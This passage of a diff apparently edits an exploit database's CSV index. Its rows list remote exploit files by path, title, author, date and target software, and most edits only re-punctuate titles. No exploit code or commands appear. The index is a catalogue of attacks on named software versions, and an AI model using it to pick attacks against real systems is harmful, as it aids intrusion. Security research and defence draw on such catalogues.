(CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 +10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660 @@ -10724,7 +10729,7 @@ id,file,description,date,author,platform,type,port 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 -11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 +11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 @@ -10744,7 +10749,7 @@ id,file,description,date,author,platform,type,port 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 11468,platforms/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)",2010-02-15,dookie,windows,remote,21 11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 -11500,platforms/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0 +11500,platforms/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - 'HTTP' Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0 11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0 11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0 @@ -10870,11 +10875,11 @@ id,file,description,date,author,platform,type,port 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,windows,remote,0 14519,platforms/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 -14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 +14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 -14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 -14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 -14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 +14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - 'DeleteFile Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 +14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - 'EnumFiles Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 +14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - 'FileExists Method' ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray",2010-08-08,"ThE g0bL!N",windows,remote,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - 'FileExists' ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 @@ -10962,7 +10967,7 @@ id,file,description,date,author,platform,type,port 15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15809,platforms/windows/remote/15809.html,"Microsoft WMITools - ActiveX Remote Command Execution",2010-12-22,WooYun,windows,remote,0 -15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - (HEAD) Buffer Overflow RET + (SEH)",2010-12-26,TheLeader,windows,remote,0 +15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - 'HEAD' Buffer Overflow RET (SEH)",2010-12-26,TheLeader,windows,remote,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"QuickPHP Web Server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 @@ -10985,9 +10990,9 @@ id,file,description,date,author,platform,type,port 16055,platforms/windows/remote/16055.txt,"Oracle Document Capture - 'empop3.dll' Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 -16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0 +16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - 'http_response' Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0 16100,platforms/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",hardware,remote,0 -16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - (PASV) Buffer Overflow Exploit",2011-02-03,modpr0be,windows,remote,0 +16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - 'PASV' Buffer Overflow Exploit",2011-02-03,modpr0be,windows,remote,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,windows,remote,0 16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 @@ -11136,7 +11141,7 @@ id,file,description,date,author,platform,type,port 16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 -16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 +16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)",2010-11-04,Metasploit,windows,remote,0 16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -11360,7 +11365,7 @@ id,file,description,date,author,platform,type,port 16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 -16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16719,platforms/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21 16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 @@ -11398,7 +11403,7 @@ id,file,description,date,author,platform,type,port 16752,platforms/windows/remote/16752.rb,"Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"MiniShare 1.4.1 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 -16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload (Metasploit)",2010-10-19,Metasploit,windows,remote,8080 +16755,platforms/windows/remote/16755.rb,"Novell iManager - 'getMultiPartParameters' Arbitrary File Upload (Metasploit)",2010-10-19,Metasploit,windows,remote,8080 16756,platforms/windows/remote/16756.rb,"Sambar Server 6 - Search Results Buffer Overflow (Metasploit)",2010-02-13,Metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow (Metasploit)",2010-07-16,Metasploit,windows,remote,9999 @@ -11408,7 +11413,7 @@ id,file,description,date,author,platform,type,port 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,windows,remote,0 -16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 +16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail Server 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -11519,7 +11524,7 @@ id,file,description,date,author,platform,type,port 16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0 -16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0 +16903,platforms/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,linux,remote,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0 @@ -11775,7 +11780,7 @@ id,file,description,date,author,platform,type,port 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0 -18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 +18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Injection",2012-03-22,rgod,windows,remote,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 @@ -11850,7 +11855,6 @@ id,file,description,date,author,platform,type,port 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 -19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0 @@ -11957,7 +11961,6 @@ id,file,description,date,author,platform,type,port 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0 -19531,platforms/hardware/remote/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,remote,0 19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 @@ -12011,7 +12014,7 @@ id,file,description,date,author,platform,type,port 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote,0 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",unix,remote,0 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",windows,remote,0 -19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - (print_domain_name) Buffer Overflow",1999-12-07,K2,solaris,remote,0 +19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Buffer Overflow",1999-12-07,K2,solaris,remote,0 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow",1999-12-09,"Amanda Woodward",multiple,remote,0 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 19669,platforms/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (2)",1999-06-24,"Cheez Whiz",solaris,remote,0 @@ -12182,7 +12185,7 @@ id,file,description,date,author,platform,type,port 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote,0 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0 20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT - ActiveX Control Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,remote,0 -20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - pbcontrol.php Command Injection (Metasploit)",2012-07-27,Metasploit,linux,remote,0 +20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - 'pbcontrol.php' Command Injection (Metasploit)",2012-07-27,Metasploit,linux,remote,0 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote,0 20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution",2000-08-08,"Brian Masney",linux,remote,0 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 @@ -12311,7 +12314,7 @@ id,file,description,date,author,platform,type,port 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,cgi,remote,0 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0 -20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 +20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - 'bb-hist.sh?HISTFILE' File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0 @@ -12706,8 +12709,8 @@ id,file,description,date,author,platform,type,port 21311,platforms/windows/remote/21311.txt,"BPM Studio Pro 4.2 - HTTPD Directory Traversal",2002-02-27,UNTER,windows,remote,0 21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure",2002-03-05,"David Litchfield",windows,remote,0 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One",2002-03-07,Morgan,unix,remote,0 -21334,platforms/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - MultiFileUpload.php Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",php,remote,0 -21335,platforms/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - MultiFileUpload.php Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",php,remote,0 +21334,platforms/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",php,remote,0 +21335,platforms/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",php,remote,0 21339,platforms/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote,0 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote,0 @@ -12726,7 +12729,7 @@ id,file,description,date,author,platform,type,port 21376,platforms/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 - History List Script Injection",2002-04-15,"Andreas Sandblad",windows,remote,0 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch - Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 21384,platforms/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection",2002-04-15,"pokleyzz sakamaniaka",multiple,remote,0 -21385,platforms/windows/remote/21385.txt,"Microsoft IIS 5.0 - CodeBrws.asp Source Code Disclosure",2002-04-16,"H D Moore",windows,remote,0 +21385,platforms/windows/remote/21385.txt,"Microsoft IIS 5.0 - 'CodeBrws.asp' Source Code Disclosure",2002-04-16,"H D Moore",windows,remote,0 21386,platforms/windows/remote/21386.html,"AOL Instant Messenger 4.x - Arbitrary File Creation",2002-04-17,"Noah Johnson",windows,remote,0 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,cgi,remote,0 21402,platforms/linux/remote/21402.txt,"OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token Buffer Overflow",2002-04-19,"Marcell Fodor",linux,remote,0 @@ -12795,7 +12798,7 @@ id,file,description,date,author,platform,type,port 21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal Information Disclosure",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",multiple,remote,0 21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting",2002-07-10,"Matt Moore",linux,remote,0 -21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - Denial of Service Device Name / Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0 +21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0 21606,platforms/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 - OBJECT Tag Same Origin Policy Violation",2002-07-10,"Thor Larholm",windows,remote,0 21607,platforms/windows/remote/21607.txt,"GoAhead Web Server 2.1.x - URL Encoded Slash Directory Traversal",2002-07-10,"Matt Moore",windows,remote,0 21608,platforms/windows/remote/21608.txt,"GoAhead Web Server 2.1.x - Error Page Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0 @@ -12864,7 +12867,7 @@ id,file,description,date,author,platform,type,port 21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)",2002-04-16,"GreyMagic Software",windows,remote,0 21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0 21752,platforms/multiple/remote/21752.txt,"Blazix 1.2 - Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote,0 -21753,platforms/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.php Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote,0 +21753,platforms/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - 'test.php' Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote,0 21754,platforms/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote,0 21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0 21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0 @@ -12930,7 +12933,7 @@ id,file,description,date,author,platform,type,port 21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 21974,platforms/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution",2002-10-31,"Sebastian Krahmer",unix,remote,0 21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote,0 -21993,platforms/php/remote/21993.rb,"AjaXplorer - checkInstall.php Remote Command Execution (Metasploit)",2012-10-16,Metasploit,php,remote,0 +21993,platforms/php/remote/21993.rb,"AjaXplorer - 'checkInstall.php' Remote Command Execution (Metasploit)",2012-10-16,Metasploit,php,remote,0 21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 - Non-Existent NSF 